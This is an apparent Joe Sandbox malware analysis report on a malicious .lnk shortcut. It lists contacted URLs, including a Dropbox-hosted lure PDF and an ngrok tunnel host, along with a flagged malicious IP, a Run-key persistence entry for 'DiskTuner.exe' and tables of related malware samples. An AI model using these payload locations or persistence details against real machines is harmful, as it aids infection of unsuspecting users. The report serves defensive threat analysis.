                                                                                                                                                                                                  https://www.dropbox.com/static/api/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://docsend.com/powershell.exe, 00000004.00000002.1571110372.0000020580396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.000002058041E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205803AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.00000205806F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E547000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1724766561.000001E54E4CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://anglebug.com/7604msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/7761msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/7760msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/5901msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/3965msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/6439msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/7406msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://anglebug.com/7161msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://anglebug.com/7162msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppupowershell.exe, 00000011.00000002.1722238823.000001E54BA99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000004.00000002.1571110372.0000020581F82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581468000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1571110372.0000020581FA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/5906msedge.exe, 00000006.00000002.1481028986.00002DF40257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://anglebug.com/2517msedge.exe, 00000006.00000003.1467579173.00002DF402568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                162.125.65.15
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		19679DROPBOXUSfalse
                                                                                                                                                                                                                                162.125.69.18
                                                                                                                                                                                                                                		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                                		19679DROPBOXUSfalse
                                                                                                                                                                                                                                162.125.69.15
                                                                                                                                                                                                                                		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                                		19679DROPBOXUSfalse
                                                                                                                                                                                                                                162.159.61.3
                                                                                                                                                                                                                                		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                18.192.31.165
                                                                                                                                                                                                                                		7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                142.250.181.65
                                                                                                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                104.161.43.18
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		53755IOFLOODUStrue
                                                                                                                                                                                                                                172.64.41.3
                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                		unknownunknownfalse

                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.7
                                                                                                                                                                                                                                192.168.2.23
                                                                                                                                                                                                                                192.168.2.27
                                                                                                                                                                                                                                192.168.2.13
                                                                                                                                                                                                                                192.168.2.14
                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1572664
                                                                                                                                                                                                                                Start date and time:2024-12-10 18:40:11 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 10m 42s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:44
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:l92fYljXWF.lnk
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:7bf94eeba4e03807a11b7957cbc90442c1066aff96258bed4f2cefc89c66abaa.lnk
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.evad.winLNK@82/286@21/15
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 33.3%
                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .lnk

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.42.16, 13.107.21.239, 204.79.197.239, 172.217.19.238, 13.107.6.158, 217.20.58.101, 23.218.208.109, 104.110.240.201, 104.110.240.232, 2.16.158.72, 2.16.158.83, 2.16.158.75, 2.16.158.82, 2.16.158.81, 2.16.158.74, 2.16.158.90, 2.16.158.59, 2.16.158.80, 172.165.61.93, 104.110.240.219, 104.110.240.224, 13.87.96.169, 20.189.173.20, 199.232.210.172, 142.250.81.227, 142.251.32.99, 142.250.65.195, 13.107.246.63, 94.245.104.56, 52.149.20.212, 20.190.181.23, 13.107.246.40, 23.57.90.153, 20.25.227.174, 23.55.235.251
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.a
                                                                                                                                                                                                                                • Execution Graph export aborted for target 1061714629.exe, PID 9716 because there are no executed function
                                                                                                                                                                                                                                • Execution Graph export aborted for target fontdrvhost.exe, PID 9784 because there are no executed function
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7600 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7976 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: l92fYljXWF.lnk

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                12:41:16API Interceptor188x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                12:41:29API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                14:08:43API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                20:08:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe
                                                                                                                                                                                                                                20:08:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                162.125.65.15pay.batGet hashmaliciousKimsukyBrowse
                                                                                                                                                                                                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://www.dropbox.com/l/AADw7QsXXUEgtGMTkaD6s_noiLvCBcZslDg/downloadingGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      35N4PXWcmC.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        162.159.61.3Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                            https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  Distribution Agreement -21_12_48-December 6, 2024-be1f31b3a4b24beb88d27adfd723203e.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    FW_ _Reminder_ Membership Credit Verification - TPIS Industrial Services_ LLC.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      SADP.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                            162.125.69.18Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                    kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                      kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                        7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                          kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                            https://docsend.com/view/nw5cttresp36nsvcGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                162.125.69.15Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                    zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            Rechnung-Kfz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                  fg.microsoft.map.fastly.netRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                  EgnyteDesktopApp_3.17.1_144.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                  sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                  oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                  9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                  4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                  Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                  098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.210.172
                                                                                                                                                                                                                                                                                                  loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                  Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 199.232.214.172
                                                                                                                                                                                                                                                                                                  chrome.cloudflare-dns.comRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                  https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                  my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                  sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                                                  7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  edge-block-www-env.dropbox-dns.comRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15

                                                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                  CLOUDFLARENETUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                                                  CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                                                                                                  XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                  • 104.21.64.1
                                                                                                                                                                                                                                                                                                  https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                  • 172.67.145.201
                                                                                                                                                                                                                                                                                                  9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.140.238
                                                                                                                                                                                                                                                                                                  Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                  • 188.114.97.6
                                                                                                                                                                                                                                                                                                  UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.66.0.236
                                                                                                                                                                                                                                                                                                  xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.159.140.238
                                                                                                                                                                                                                                                                                                  K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 104.16.77.47
                                                                                                                                                                                                                                                                                                  HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 172.66.0.236
                                                                                                                                                                                                                                                                                                  DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
